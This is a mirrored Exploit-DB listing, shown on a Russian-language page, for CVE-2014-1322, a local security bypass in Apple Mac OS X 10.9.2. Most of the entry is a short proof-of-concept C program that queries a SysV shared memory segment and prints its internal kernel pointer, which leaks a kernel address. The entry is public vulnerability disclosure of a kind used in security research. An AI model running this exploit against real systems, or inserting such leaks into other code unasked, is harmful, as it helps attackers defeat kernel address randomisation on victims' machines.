- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39147
- Проверка EDB
-
- Пройдено
- Автор
- IAN BEER
- Тип уязвимости
- LOCAL
- Платформа
- OSX
- CVE
- cve-2014-1322
- Дата публикации
- 2014-04-22
Apple Mac OSX - Local Security Bypass
C:
// source: https://www.securityfocus.com/bid/67023/info
Apple Mac OS X is prone to a local security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected.
#include <stdio.h>
#include <strings.h>
#include <sys/shm.h>
int main(int argc, char *argv[])
{
int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
if (shm < 0)
{
printf("shmget: failed");
return 6;
}
struct shmid_ds lolz;
int res = shmctl( shm, IPC_STAT, &lolz );
if (res < 0)
{
printf("shmctl: failed");
return 1;
}
printf( "%p\n", lolz.shm_internal );
}- Источник
- www.exploit-db.com
